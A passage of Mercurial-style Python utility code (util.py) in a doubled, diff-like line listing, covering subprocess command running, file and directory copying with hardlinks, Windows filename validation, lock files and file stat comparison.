1738 cmd = quotecommand(cmd)
1738 cmd = quotecommand(cmd)
1739 env = shellenviron(environ)
1739 env = shellenviron(environ)
1740 if out is None or isstdout(out):
1740 if out is None or isstdout(out):
1741 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1741 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1742 env=env, cwd=cwd)
1742 env=env, cwd=cwd)
1743 else:
1743 else:
1744 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1744 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1745 env=env, cwd=cwd, stdout=subprocess.PIPE,
1745 env=env, cwd=cwd, stdout=subprocess.PIPE,
1746 stderr=subprocess.STDOUT)
1746 stderr=subprocess.STDOUT)
1747 for line in iter(proc.stdout.readline, ''):
1747 for line in iter(proc.stdout.readline, ''):
1748 out.write(line)
1748 out.write(line)
1749 proc.wait()
1749 proc.wait()
1750 rc = proc.returncode
1750 rc = proc.returncode
1751 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1751 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1752 rc = 0
1752 rc = 0
1753 return rc
1753 return rc
1754
1754
1755 def checksignature(func):
1755 def checksignature(func):
1756 '''wrap a function with code to check for calling errors'''
1756 '''wrap a function with code to check for calling errors'''
1757 def check(*args, **kwargs):
1757 def check(*args, **kwargs):
1758 try:
1758 try:
1759 return func(*args, **kwargs)
1759 return func(*args, **kwargs)
1760 except TypeError:
1760 except TypeError:
1761 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1761 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1762 raise error.SignatureError
1762 raise error.SignatureError
1763 raise
1763 raise
1764
1764
1765 return check
1765 return check
1766
1766
1767 # a whilelist of known filesystems where hardlink works reliably
1767 # a whilelist of known filesystems where hardlink works reliably
1768 _hardlinkfswhitelist = {
1768 _hardlinkfswhitelist = {
1769 'btrfs',
1769 'btrfs',
1770 'ext2',
1770 'ext2',
1771 'ext3',
1771 'ext3',
1772 'ext4',
1772 'ext4',
1773 'hfs',
1773 'hfs',
1774 'jfs',
1774 'jfs',
1775 'NTFS',
1775 'NTFS',
1776 'reiserfs',
1776 'reiserfs',
1777 'tmpfs',
1777 'tmpfs',
1778 'ufs',
1778 'ufs',
1779 'xfs',
1779 'xfs',
1780 'zfs',
1780 'zfs',
1781 }
1781 }
1782
1782
1783 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1783 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1784 '''copy a file, preserving mode and optionally other stat info like
1784 '''copy a file, preserving mode and optionally other stat info like
1785 atime/mtime
1785 atime/mtime
1786
1786
1787 checkambig argument is used with filestat, and is useful only if
1787 checkambig argument is used with filestat, and is useful only if
1788 destination file is guarded by any lock (e.g. repo.lock or
1788 destination file is guarded by any lock (e.g. repo.lock or
1789 repo.wlock).
1789 repo.wlock).
1790
1790
1791 copystat and checkambig should be exclusive.
1791 copystat and checkambig should be exclusive.
1792 '''
1792 '''
1793 assert not (copystat and checkambig)
1793 assert not (copystat and checkambig)
1794 oldstat = None
1794 oldstat = None
1795 if os.path.lexists(dest):
1795 if os.path.lexists(dest):
1796 if checkambig:
1796 if checkambig:
1797 oldstat = checkambig and filestat.frompath(dest)
1797 oldstat = checkambig and filestat.frompath(dest)
1798 unlink(dest)
1798 unlink(dest)
1799 if hardlink:
1799 if hardlink:
1800 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1800 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1801 # unless we are confident that dest is on a whitelisted filesystem.
1801 # unless we are confident that dest is on a whitelisted filesystem.
1802 try:
1802 try:
1803 fstype = getfstype(os.path.dirname(dest))
1803 fstype = getfstype(os.path.dirname(dest))
1804 except OSError:
1804 except OSError:
1805 fstype = None
1805 fstype = None
1806 if fstype not in _hardlinkfswhitelist:
1806 if fstype not in _hardlinkfswhitelist:
1807 hardlink = False
1807 hardlink = False
1808 if hardlink:
1808 if hardlink:
1809 try:
1809 try:
1810 oslink(src, dest)
1810 oslink(src, dest)
1811 return
1811 return
1812 except (IOError, OSError):
1812 except (IOError, OSError):
1813 pass # fall back to normal copy
1813 pass # fall back to normal copy
1814 if os.path.islink(src):
1814 if os.path.islink(src):
1815 os.symlink(os.readlink(src), dest)
1815 os.symlink(os.readlink(src), dest)
1816 # copytime is ignored for symlinks, but in general copytime isn't needed
1816 # copytime is ignored for symlinks, but in general copytime isn't needed
1817 # for them anyway
1817 # for them anyway
1818 else:
1818 else:
1819 try:
1819 try:
1820 shutil.copyfile(src, dest)
1820 shutil.copyfile(src, dest)
1821 if copystat:
1821 if copystat:
1822 # copystat also copies mode
1822 # copystat also copies mode
1823 shutil.copystat(src, dest)
1823 shutil.copystat(src, dest)
1824 else:
1824 else:
1825 shutil.copymode(src, dest)
1825 shutil.copymode(src, dest)
1826 if oldstat and oldstat.stat:
1826 if oldstat and oldstat.stat:
1827 newstat = filestat.frompath(dest)
1827 newstat = filestat.frompath(dest)
1828 if newstat.isambig(oldstat):
1828 if newstat.isambig(oldstat):
1829 # stat of copied file is ambiguous to original one
1829 # stat of copied file is ambiguous to original one
1830 advanced = (
1830 advanced = (
1831 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1831 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1832 os.utime(dest, (advanced, advanced))
1832 os.utime(dest, (advanced, advanced))
1833 except shutil.Error as inst:
1833 except shutil.Error as inst:
1834 raise Abort(str(inst))
1834 raise error.Abort(str(inst))
1835
1835
1836 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1836 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1837 """Copy a directory tree using hardlinks if possible."""
1837 """Copy a directory tree using hardlinks if possible."""
1838 num = 0
1838 num = 0
1839
1839
1840 gettopic = lambda: hardlink and _('linking') or _('copying')
1840 gettopic = lambda: hardlink and _('linking') or _('copying')
1841
1841
1842 if os.path.isdir(src):
1842 if os.path.isdir(src):
1843 if hardlink is None:
1843 if hardlink is None:
1844 hardlink = (os.stat(src).st_dev ==
1844 hardlink = (os.stat(src).st_dev ==
1845 os.stat(os.path.dirname(dst)).st_dev)
1845 os.stat(os.path.dirname(dst)).st_dev)
1846 topic = gettopic()
1846 topic = gettopic()
1847 os.mkdir(dst)
1847 os.mkdir(dst)
1848 for name, kind in listdir(src):
1848 for name, kind in listdir(src):
1849 srcname = os.path.join(src, name)
1849 srcname = os.path.join(src, name)
1850 dstname = os.path.join(dst, name)
1850 dstname = os.path.join(dst, name)
1851 def nprog(t, pos):
1851 def nprog(t, pos):
1852 if pos is not None:
1852 if pos is not None:
1853 return progress(t, pos + num)
1853 return progress(t, pos + num)
1854 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1854 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1855 num += n
1855 num += n
1856 else:
1856 else:
1857 if hardlink is None:
1857 if hardlink is None:
1858 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1858 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1859 os.stat(os.path.dirname(dst)).st_dev)
1859 os.stat(os.path.dirname(dst)).st_dev)
1860 topic = gettopic()
1860 topic = gettopic()
1861
1861
1862 if hardlink:
1862 if hardlink:
1863 try:
1863 try:
1864 oslink(src, dst)
1864 oslink(src, dst)
1865 except (IOError, OSError):
1865 except (IOError, OSError):
1866 hardlink = False
1866 hardlink = False
1867 shutil.copy(src, dst)
1867 shutil.copy(src, dst)
1868 else:
1868 else:
1869 shutil.copy(src, dst)
1869 shutil.copy(src, dst)
1870 num += 1
1870 num += 1
1871 progress(topic, num)
1871 progress(topic, num)
1872 progress(topic, None)
1872 progress(topic, None)
1873
1873
1874 return hardlink, num
1874 return hardlink, num
1875
1875
1876 _winreservednames = {
1876 _winreservednames = {
1877 'con', 'prn', 'aux', 'nul',
1877 'con', 'prn', 'aux', 'nul',
1878 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1878 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1879 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1879 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1880 }
1880 }
1881 _winreservedchars = ':*?"<>|'
1881 _winreservedchars = ':*?"<>|'
1882 def checkwinfilename(path):
1882 def checkwinfilename(path):
1883 r'''Check that the base-relative path is a valid filename on Windows.
1883 r'''Check that the base-relative path is a valid filename on Windows.
1884 Returns None if the path is ok, or a UI string describing the problem.
1884 Returns None if the path is ok, or a UI string describing the problem.
1885
1885
1886 >>> checkwinfilename(b"just/a/normal/path")
1886 >>> checkwinfilename(b"just/a/normal/path")
1887 >>> checkwinfilename(b"foo/bar/con.xml")
1887 >>> checkwinfilename(b"foo/bar/con.xml")
1888 "filename contains 'con', which is reserved on Windows"
1888 "filename contains 'con', which is reserved on Windows"
1889 >>> checkwinfilename(b"foo/con.xml/bar")
1889 >>> checkwinfilename(b"foo/con.xml/bar")
1890 "filename contains 'con', which is reserved on Windows"
1890 "filename contains 'con', which is reserved on Windows"
1891 >>> checkwinfilename(b"foo/bar/xml.con")
1891 >>> checkwinfilename(b"foo/bar/xml.con")
1892 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1892 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1893 "filename contains 'AUX', which is reserved on Windows"
1893 "filename contains 'AUX', which is reserved on Windows"
1894 >>> checkwinfilename(b"foo/bar/bla:.txt")
1894 >>> checkwinfilename(b"foo/bar/bla:.txt")
1895 "filename contains ':', which is reserved on Windows"
1895 "filename contains ':', which is reserved on Windows"
1896 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1896 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1897 "filename contains '\\x07', which is invalid on Windows"
1897 "filename contains '\\x07', which is invalid on Windows"
1898 >>> checkwinfilename(b"foo/bar/bla ")
1898 >>> checkwinfilename(b"foo/bar/bla ")
1899 "filename ends with ' ', which is not allowed on Windows"
1899 "filename ends with ' ', which is not allowed on Windows"
1900 >>> checkwinfilename(b"../bar")
1900 >>> checkwinfilename(b"../bar")
1901 >>> checkwinfilename(b"foo\\")
1901 >>> checkwinfilename(b"foo\\")
1902 "filename ends with '\\', which is invalid on Windows"
1902 "filename ends with '\\', which is invalid on Windows"
1903 >>> checkwinfilename(b"foo\\/bar")
1903 >>> checkwinfilename(b"foo\\/bar")
1904 "directory name ends with '\\', which is invalid on Windows"
1904 "directory name ends with '\\', which is invalid on Windows"
1905 '''
1905 '''
1906 if path.endswith('\\'):
1906 if path.endswith('\\'):
1907 return _("filename ends with '\\', which is invalid on Windows")
1907 return _("filename ends with '\\', which is invalid on Windows")
1908 if '\\/' in path:
1908 if '\\/' in path:
1909 return _("directory name ends with '\\', which is invalid on Windows")
1909 return _("directory name ends with '\\', which is invalid on Windows")
1910 for n in path.replace('\\', '/').split('/'):
1910 for n in path.replace('\\', '/').split('/'):
1911 if not n:
1911 if not n:
1912 continue
1912 continue
1913 for c in _filenamebytestr(n):
1913 for c in _filenamebytestr(n):
1914 if c in _winreservedchars:
1914 if c in _winreservedchars:
1915 return _("filename contains '%s', which is reserved "
1915 return _("filename contains '%s', which is reserved "
1916 "on Windows") % c
1916 "on Windows") % c
1917 if ord(c) <= 31:
1917 if ord(c) <= 31:
1918 return _("filename contains '%s', which is invalid "
1918 return _("filename contains '%s', which is invalid "
1919 "on Windows") % stringutil.escapestr(c)
1919 "on Windows") % stringutil.escapestr(c)
1920 base = n.split('.')[0]
1920 base = n.split('.')[0]
1921 if base and base.lower() in _winreservednames:
1921 if base and base.lower() in _winreservednames:
1922 return _("filename contains '%s', which is reserved "
1922 return _("filename contains '%s', which is reserved "
1923 "on Windows") % base
1923 "on Windows") % base
1924 t = n[-1:]
1924 t = n[-1:]
1925 if t in '. ' and n not in '..':
1925 if t in '. ' and n not in '..':
1926 return _("filename ends with '%s', which is not allowed "
1926 return _("filename ends with '%s', which is not allowed "
1927 "on Windows") % t
1927 "on Windows") % t
1928
1928
1929 if pycompat.iswindows:
1929 if pycompat.iswindows:
1930 checkosfilename = checkwinfilename
1930 checkosfilename = checkwinfilename
1931 timer = time.clock
1931 timer = time.clock
1932 else:
1932 else:
1933 checkosfilename = platform.checkosfilename
1933 checkosfilename = platform.checkosfilename
1934 timer = time.time
1934 timer = time.time
1935
1935
1936 if safehasattr(time, "perf_counter"):
1936 if safehasattr(time, "perf_counter"):
1937 timer = time.perf_counter
1937 timer = time.perf_counter
1938
1938
1939 def makelock(info, pathname):
1939 def makelock(info, pathname):
1940 """Create a lock file atomically if possible
1940 """Create a lock file atomically if possible
1941
1941
1942 This may leave a stale lock file if symlink isn't supported and signal
1942 This may leave a stale lock file if symlink isn't supported and signal
1943 interrupt is enabled.
1943 interrupt is enabled.
1944 """
1944 """
1945 try:
1945 try:
1946 return os.symlink(info, pathname)
1946 return os.symlink(info, pathname)
1947 except OSError as why:
1947 except OSError as why:
1948 if why.errno == errno.EEXIST:
1948 if why.errno == errno.EEXIST:
1949 raise
1949 raise
1950 except AttributeError: # no symlink in os
1950 except AttributeError: # no symlink in os
1951 pass
1951 pass
1952
1952
1953 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1953 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1954 ld = os.open(pathname, flags)
1954 ld = os.open(pathname, flags)
1955 os.write(ld, info)
1955 os.write(ld, info)
1956 os.close(ld)
1956 os.close(ld)
1957
1957
1958 def readlock(pathname):
1958 def readlock(pathname):
1959 try:
1959 try:
1960 return os.readlink(pathname)
1960 return os.readlink(pathname)
1961 except OSError as why:
1961 except OSError as why:
1962 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1962 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1963 raise
1963 raise
1964 except AttributeError: # no symlink in os
1964 except AttributeError: # no symlink in os
1965 pass
1965 pass
1966 fp = posixfile(pathname, 'rb')
1966 fp = posixfile(pathname, 'rb')
1967 r = fp.read()
1967 r = fp.read()
1968 fp.close()
1968 fp.close()
1969 return r
1969 return r
1970
1970
1971 def fstat(fp):
1971 def fstat(fp):
1972 '''stat file object that may not have fileno method.'''
1972 '''stat file object that may not have fileno method.'''
1973 try:
1973 try:
1974 return os.fstat(fp.fileno())
1974 return os.fstat(fp.fileno())
1975 except AttributeError:
1975 except AttributeError:
1976 return os.stat(fp.name)
1976 return os.stat(fp.name)
1977
1977
1978 # File system features
1978 # File system features
1979
1979
1980 def fscasesensitive(path):
1980 def fscasesensitive(path):
1981 """
1981 """
1982 Return true if the given path is on a case-sensitive filesystem
1982 Return true if the given path is on a case-sensitive filesystem
1983
1983
1984 Requires a path (like /foo/.hg) ending with a foldable final
1984 Requires a path (like /foo/.hg) ending with a foldable final
1985 directory component.
1985 directory component.
1986 """
1986 """
1987 s1 = os.lstat(path)
1987 s1 = os.lstat(path)
1988 d, b = os.path.split(path)
1988 d, b = os.path.split(path)
1989 b2 = b.upper()
1989 b2 = b.upper()
1990 if b == b2:
1990 if b == b2:
1991 b2 = b.lower()
1991 b2 = b.lower()
1992 if b == b2:
1992 if b == b2:
1993 return True # no evidence against case sensitivity
1993 return True # no evidence against case sensitivity
1994 p2 = os.path.join(d, b2)
1994 p2 = os.path.join(d, b2)
1995 try:
1995 try:
1996 s2 = os.lstat(p2)
1996 s2 = os.lstat(p2)
1997 if s2 == s1:
1997 if s2 == s1:
1998 return False
1998 return False
1999 return True
1999 return True
2000 except OSError:
2000 except OSError:
2001 return True
2001 return True
2002
2002
2003 try:
2003 try:
2004 import re2
2004 import re2
2005 _re2 = None
2005 _re2 = None
2006 except ImportError:
2006 except ImportError:
2007 _re2 = False
2007 _re2 = False
2008
2008
2009 class _re(object):
2009 class _re(object):
2010 def _checkre2(self):
2010 def _checkre2(self):
2011 global _re2
2011 global _re2
2012 try:
2012 try:
2013 # check if match works, see issue3964
2013 # check if match works, see issue3964
2014 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2014 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
2015 except ImportError:
2015 except ImportError:
2016 _re2 = False
2016 _re2 = False
2017
2017
2018 def compile(self, pat, flags=0):
2018 def compile(self, pat, flags=0):
2019 '''Compile a regular expression, using re2 if possible
2019 '''Compile a regular expression, using re2 if possible
2020
2020
2021 For best performance, use only re2-compatible regexp features. The
2021 For best performance, use only re2-compatible regexp features. The
2022 only flags from the re module that are re2-compatible are
2022 only flags from the re module that are re2-compatible are
2023 IGNORECASE and MULTILINE.'''
2023 IGNORECASE and MULTILINE.'''
2024 if _re2 is None:
2024 if _re2 is None:
2025 self._checkre2()
2025 self._checkre2()
2026 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2026 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2027 if flags & remod.IGNORECASE:
2027 if flags & remod.IGNORECASE:
2028 pat = '(?i)' + pat
2028 pat = '(?i)' + pat
2029 if flags & remod.MULTILINE:
2029 if flags & remod.MULTILINE:
2030 pat = '(?m)' + pat
2030 pat = '(?m)' + pat
2031 try:
2031 try:
2032 return re2.compile(pat)
2032 return re2.compile(pat)
2033 except re2.error:
2033 except re2.error:
2034 pass
2034 pass
2035 return remod.compile(pat, flags)
2035 return remod.compile(pat, flags)
2036
2036
2037 @propertycache
2037 @propertycache
2038 def escape(self):
2038 def escape(self):
2039 '''Return the version of escape corresponding to self.compile.
2039 '''Return the version of escape corresponding to self.compile.
2040
2040
2041 This is imperfect because whether re2 or re is used for a particular
2041 This is imperfect because whether re2 or re is used for a particular
2042 function depends on the flags, etc, but it's the best we can do.
2042 function depends on the flags, etc, but it's the best we can do.
2043 '''
2043 '''
2044 global _re2
2044 global _re2
2045 if _re2 is None:
2045 if _re2 is None:
2046 self._checkre2()
2046 self._checkre2()
2047 if _re2:
2047 if _re2:
2048 return re2.escape
2048 return re2.escape
2049 else:
2049 else:
2050 return remod.escape
2050 return remod.escape
2051
2051
2052 re = _re()
2052 re = _re()
2053
2053
2054 _fspathcache = {}
2054 _fspathcache = {}
2055 def fspath(name, root):
2055 def fspath(name, root):
2056 '''Get name in the case stored in the filesystem
2056 '''Get name in the case stored in the filesystem
2057
2057
2058 The name should be relative to root, and be normcase-ed for efficiency.
2058 The name should be relative to root, and be normcase-ed for efficiency.
2059
2059
2060 Note that this function is unnecessary, and should not be
2060 Note that this function is unnecessary, and should not be
2061 called, for case-sensitive filesystems (simply because it's expensive).
2061 called, for case-sensitive filesystems (simply because it's expensive).
2062
2062
2063 The root should be normcase-ed, too.
2063 The root should be normcase-ed, too.
2064 '''
2064 '''
2065 def _makefspathcacheentry(dir):
2065 def _makefspathcacheentry(dir):
2066 return dict((normcase(n), n) for n in os.listdir(dir))
2066 return dict((normcase(n), n) for n in os.listdir(dir))
2067
2067
2068 seps = pycompat.ossep
2068 seps = pycompat.ossep
2069 if pycompat.osaltsep:
2069 if pycompat.osaltsep:
2070 seps = seps + pycompat.osaltsep
2070 seps = seps + pycompat.osaltsep
2071 # Protect backslashes. This gets silly very quickly.
2071 # Protect backslashes. This gets silly very quickly.
2072 seps.replace('\\','\\\\')
2072 seps.replace('\\','\\\\')
2073 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2073 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2074 dir = os.path.normpath(root)
2074 dir = os.path.normpath(root)
2075 result = []
2075 result = []
2076 for part, sep in pattern.findall(name):
2076 for part, sep in pattern.findall(name):
2077 if sep:
2077 if sep:
2078 result.append(sep)
2078 result.append(sep)
2079 continue
2079 continue
2080
2080
2081 if dir not in _fspathcache:
2081 if dir not in _fspathcache:
2082 _fspathcache[dir] = _makefspathcacheentry(dir)
2082 _fspathcache[dir] = _makefspathcacheentry(dir)
2083 contents = _fspathcache[dir]
2083 contents = _fspathcache[dir]
2084
2084
2085 found = contents.get(part)
2085 found = contents.get(part)
2086 if not found:
2086 if not found:
2087 # retry "once per directory" per "dirstate.walk" which
2087 # retry "once per directory" per "dirstate.walk" which
2088 # may take place for each patches of "hg qpush", for example
2088 # may take place for each patches of "hg qpush", for example
2089 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2089 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2090 found = contents.get(part)
2090 found = contents.get(part)
2091
2091
2092 result.append(found or part)
2092 result.append(found or part)
2093 dir = os.path.join(dir, part)
2093 dir = os.path.join(dir, part)
2094
2094
2095 return ''.join(result)
2095 return ''.join(result)
2096
2096
2097 def checknlink(testfile):
2097 def checknlink(testfile):
2098 '''check whether hardlink count reporting works properly'''
2098 '''check whether hardlink count reporting works properly'''
2099
2099
2100 # testfile may be open, so we need a separate file for checking to
2100 # testfile may be open, so we need a separate file for checking to
2101 # work around issue2543 (or testfile may get lost on Samba shares)
2101 # work around issue2543 (or testfile may get lost on Samba shares)
2102 f1, f2, fp = None, None, None
2102 f1, f2, fp = None, None, None
2103 try:
2103 try:
2104 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2104 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2105 suffix='1~', dir=os.path.dirname(testfile))
2105 suffix='1~', dir=os.path.dirname(testfile))
2106 os.close(fd)
2106 os.close(fd)
2107 f2 = '%s2~' % f1[:-2]
2107 f2 = '%s2~' % f1[:-2]
2108
2108
2109 oslink(f1, f2)
2109 oslink(f1, f2)
2110 # nlinks() may behave differently for files on Windows shares if
2110 # nlinks() may behave differently for files on Windows shares if
2111 # the file is open.
2111 # the file is open.
2112 fp = posixfile(f2)
2112 fp = posixfile(f2)
2113 return nlinks(f2) > 1
2113 return nlinks(f2) > 1
2114 except OSError:
2114 except OSError:
2115 return False
2115 return False
2116 finally:
2116 finally:
2117 if fp is not None:
2117 if fp is not None:
2118 fp.close()
2118 fp.close()
2119 for f in (f1, f2):
2119 for f in (f1, f2):
2120 try:
2120 try:
2121 if f is not None:
2121 if f is not None:
2122 os.unlink(f)
2122 os.unlink(f)
2123 except OSError:
2123 except OSError:
2124 pass
2124 pass
2125
2125
2126 def endswithsep(path):
2126 def endswithsep(path):
2127 '''Check path ends with os.sep or os.altsep.'''
2127 '''Check path ends with os.sep or os.altsep.'''
2128 return (path.endswith(pycompat.ossep)
2128 return (path.endswith(pycompat.ossep)
2129 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2129 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2130
2130
2131 def splitpath(path):
2131 def splitpath(path):
2132 '''Split path by os.sep.
2132 '''Split path by os.sep.
2133 Note that this function does not use os.altsep because this is
2133 Note that this function does not use os.altsep because this is
2134 an alternative of simple "xxx.split(os.sep)".
2134 an alternative of simple "xxx.split(os.sep)".
2135 It is recommended to use os.path.normpath() before using this
2135 It is recommended to use os.path.normpath() before using this
2136 function if need.'''
2136 function if need.'''
2137 return path.split(pycompat.ossep)
2137 return path.split(pycompat.ossep)
2138
2138
2139 def gui():
2139 def gui():
2140 '''Are we running in a GUI?'''
2140 '''Are we running in a GUI?'''
2141 if pycompat.isdarwin:
2141 if pycompat.isdarwin:
2142 if 'SSH_CONNECTION' in encoding.environ:
2142 if 'SSH_CONNECTION' in encoding.environ:
2143 # handle SSH access to a box where the user is logged in
2143 # handle SSH access to a box where the user is logged in
2144 return False
2144 return False
2145 elif getattr(osutil, 'isgui', None):
2145 elif getattr(osutil, 'isgui', None):
2146 # check if a CoreGraphics session is available
2146 # check if a CoreGraphics session is available
2147 return osutil.isgui()
2147 return osutil.isgui()
2148 else:
2148 else:
2149 # pure build; use a safe default
2149 # pure build; use a safe default
2150 return True
2150 return True
2151 else:
2151 else:
2152 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2152 return pycompat.iswindows or encoding.environ.get("DISPLAY")
2153
2153
2154 def mktempcopy(name, emptyok=False, createmode=None):
2154 def mktempcopy(name, emptyok=False, createmode=None):
2155 """Create a temporary file with the same contents from name
2155 """Create a temporary file with the same contents from name
2156
2156
2157 The permission bits are copied from the original file.
2157 The permission bits are copied from the original file.
2158
2158
2159 If the temporary file is going to be truncated immediately, you
2159 If the temporary file is going to be truncated immediately, you
2160 can use emptyok=True as an optimization.
2160 can use emptyok=True as an optimization.
2161
2161
2162 Returns the name of the temporary file.
2162 Returns the name of the temporary file.
2163 """
2163 """
2164 d, fn = os.path.split(name)
2164 d, fn = os.path.split(name)
2165 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2165 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2166 os.close(fd)
2166 os.close(fd)
2167 # Temporary files are created with mode 0600, which is usually not
2167 # Temporary files are created with mode 0600, which is usually not
2168 # what we want. If the original file already exists, just copy
2168 # what we want. If the original file already exists, just copy
2169 # its mode. Otherwise, manually obey umask.
2169 # its mode. Otherwise, manually obey umask.
2170 copymode(name, temp, createmode)
2170 copymode(name, temp, createmode)
2171 if emptyok:
2171 if emptyok:
2172 return temp
2172 return temp
2173 try:
2173 try:
2174 try:
2174 try:
2175 ifp = posixfile(name, "rb")
2175 ifp = posixfile(name, "rb")
2176 except IOError as inst:
2176 except IOError as inst:
2177 if inst.errno == errno.ENOENT:
2177 if inst.errno == errno.ENOENT:
2178 return temp
2178 return temp
2179 if not getattr(inst, 'filename', None):
2179 if not getattr(inst, 'filename', None):
2180 inst.filename = name
2180 inst.filename = name
2181 raise
2181 raise
2182 ofp = posixfile(temp, "wb")
2182 ofp = posixfile(temp, "wb")
2183 for chunk in filechunkiter(ifp):
2183 for chunk in filechunkiter(ifp):
2184 ofp.write(chunk)
2184 ofp.write(chunk)
2185 ifp.close()
2185 ifp.close()
2186 ofp.close()
2186 ofp.close()
2187 except: # re-raises
2187 except: # re-raises
2188 try:
2188 try:
2189 os.unlink(temp)
2189 os.unlink(temp)
2190 except OSError:
2190 except OSError:
2191 pass
2191 pass
2192 raise
2192 raise
2193 return temp
2193 return temp
2194
2194
2195 class filestat(object):
2195 class filestat(object):
2196 """help to exactly detect change of a file
2196 """help to exactly detect change of a file
2197
2197
2198 'stat' attribute is result of 'os.stat()' if specified 'path'
2198 'stat' attribute is result of 'os.stat()' if specified 'path'
2199 exists. Otherwise, it is None. This can avoid preparative
2199 exists. Otherwise, it is None. This can avoid preparative
2200 'exists()' examination on client side of this class.
2200 'exists()' examination on client side of this class.
2201 """
2201 """
2202 def __init__(self, stat):
2202 def __init__(self, stat):
2203 self.stat = stat
2203 self.stat = stat
2204
2204
2205 @classmethod
2205 @classmethod
2206 def frompath(cls, path):
2206 def frompath(cls, path):
2207 try:
2207 try:
2208 stat = os.stat(path)
2208 stat = os.stat(path)
2209 except OSError as err:
2209 except OSError as err:
2210 if err.errno != errno.ENOENT:
2210 if err.errno != errno.ENOENT:
2211 raise
2211 raise
2212 stat = None
2212 stat = None
2213 return cls(stat)
2213 return cls(stat)
2214
2214
2215 @classmethod
2215 @classmethod
2216 def fromfp(cls, fp):
2216 def fromfp(cls, fp):
2217 stat = os.fstat(fp.fileno())
2217 stat = os.fstat(fp.fileno())
2218 return cls(stat)
2218 return cls(stat)
2219
2219
2220 __hash__ = object.__hash__
2220 __hash__ = object.__hash__
2221
2221
2222 def __eq__(self, old):
2222 def __eq__(self, old):
2223 try:
2223 try:
2224 # if ambiguity between stat of new and old file is
2224 # if ambiguity between stat of new and old file is
2225 # avoided, comparison of size, ctime and mtime is enough
2225 # avoided, comparison of size, ctime and mtime is enough
2226 # to exactly detect change of a file regardless of platform
2226 # to exactly detect change of a file regardless of platform
2227 return (self.stat.st_size == old.stat.st_size and
2227 return (self.stat.st_size == old.stat.st_size and
2228 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2228 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2229 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2229 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2230 except AttributeError:
2230 except AttributeError:
2231 pass
2231 pass
2232 try:
2232 try:
2233 return self.stat is None and old.stat is None
2233 return self.stat is None and old.stat is None
2234 except AttributeError:
2234 except AttributeError:
2235 return False
2235 return False
2236
2236
2237 def isambig(self, old):
2237 def isambig(self, old):
2238 """Examine whether new (= self) stat is ambiguous against old one
2238 """Examine whether new (= self) stat is ambiguous against old one
2239
2239
2240 "S[N]" below means stat of a file at N-th change:
2240 "S[N]" below means stat of a file at N-th change:
2241
2241
2242 - S[n-1].ctime < S[n].ctime: can detect change of a file
2242 - S[n-1].ctime < S[n].ctime: can detect change of a file
2243 - S[n-1].ctime == S[n].ctime
2243 - S[n-1].ctime == S[n].ctime
2244 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2244 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2245 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2245 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2246 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2246 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2247 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2247 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2248
2248
2249 Case (*2) above means that a file was changed twice or more at
